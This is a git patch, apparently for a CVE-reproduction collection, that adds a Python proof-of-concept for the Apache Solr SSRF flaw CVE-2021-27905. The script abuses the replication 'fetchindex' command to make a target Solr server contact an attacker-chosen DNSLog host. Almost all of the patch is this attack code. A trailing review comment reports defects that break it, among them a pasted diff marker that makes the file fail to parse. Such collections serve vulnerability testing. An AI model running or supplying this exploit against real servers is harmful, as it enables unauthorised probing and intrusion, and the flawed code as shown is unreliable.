From cbfc4a84ad9e313c4be9bfa5dac7f4c0d06a9013 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E8=B4=BE=E8=90=A7=E5=AF=92?= <12581917+jia-xiaohan607@user.noreply.gitee.com>
Date: Fri, 10 Mar 2023 07:34:00 +0000
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0apache=20solr=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E5=A4=B9=E5=BD=92=E6=A1=A3?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 贾萧寒 <>
---
 cve/apache-solr/CVE-2021-27905.py | 82 +++++++++++++++++++++++++++++++
 openkylin_list.yaml | 2 +
 2 files changed, 84 insertions(+)
 create mode 100644 cve/apache-solr/CVE-2021-27905.py
diff --git a/cve/apache-solr/CVE-2021-27905.py b/cve/apache-solr/CVE-2021-27905.py
new file mode 100644
index 00000000..7f4a64d5
--- /dev/null
+++ b/cve/apache-solr/CVE-2021-27905.py
@@ -0,0 +1,82 @@
+# CVE-2021-27905
+# Apache solr ssrf
+
+import requests
+import urllib3
+import json
+import sys, getopt
+urllib3.disable_warnings()
+
+
+
+
+def title():
+ print("[-------------------------------------------------------------]")
+ print("[-------------- Apache Solr SSRF漏洞 ---------------]")
+ print("[-------- CVE-2021-27905 ----------]")
+ print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]")
+ print("[-------- Author:Henry4E36 ------------]")
+ print("[-------------------------------------------------------------]")
+
+def commit():
+ url = ""
+ try:
+ opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="])
+ for op, value in opt:
+ if op == "-h" or op == "--help":
+ print("""
+ [-] Apache Solr SSRF漏洞 (CVE-2021-27905)
+ [-] Options:
+ -h or --help : 方法说明
+ -u or --url : 站点URL地址
+ -d or --dnslog : DnsLog
+ """)
+ sys.exit(0)
+ elif op == "-u" or op == "--url=":
+ url = value
+ elif op == "-d" or op == "--dnslog=":
+ dnslog = value
+ else:
+ print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")
+ sys.exit()
+ return url, dnslog
+
+ except Exception as e:
+ print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")
+ sys.exit(0)
+
+def target_core(url):
+ target_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
+ }
+ try:
+ res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)
+ core = list(json.loads(res.text)["status"])[0]
+ return core
+ except Exception as e:
+ print(f"[!] 
目标系统: {url} 出现意外!\n ",e)
+
+def ssrf(core,dnslog):
+ target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
+ }
+ try:
+ res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
+ status = json.loads(res.text)["status"]
+ if res.status_code == 200 and status == "OK":
+ print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m")
+ else:
+ print(f"[0] 目标系统: {url} 不存在SSRF漏洞")
+
+ except Exception as e:
+ print(f"[!] 目标系统: {url} 出现意外!\n ", e)
+
+
+if __name__ == "__main__":
+ title()
+ url ,dnslog = commit()
+ core = target_core(url)
+ ssrf(core,dnslog)
+\ No newline at end of file
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 880fd7cb..f822acc2 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -6,6 +6,8 @@ cve:
 - CVE-2021-42013
 apache-APISIX:
 - CVE-2022-24112
+ apache-solr:
+ - CVE-2021-27905
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-22555
-- Gitee
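Review bot: The last added line of `CVE-2021-27905.py` is the literal text `\ No newline at end of file`, a diff marker pasted into the script as its line 82, so Python rejects the file with a syntax error before any check runs; that line should be deleted. In `commit()`, `op == "--url="` and `op == "--dnslog="` never match because getopt reports long options without the trailing `=`, so the long forms fall into the error branch; compare with `"--url"` and `"--dnslog"`. `ssrf(core,dnslog)` reads `url` from module scope and is still called after `target_core()` has printed an error and returned None, which sends a second request for `/solr/None/replication/` to the host; take `url` as a parameter and stop with `if core is None: sys.exit(1)`. Both requests also pass `verify=False` with urllib3 warnings suppressed, which deserves a comment stating that certificate checking is intentionally off.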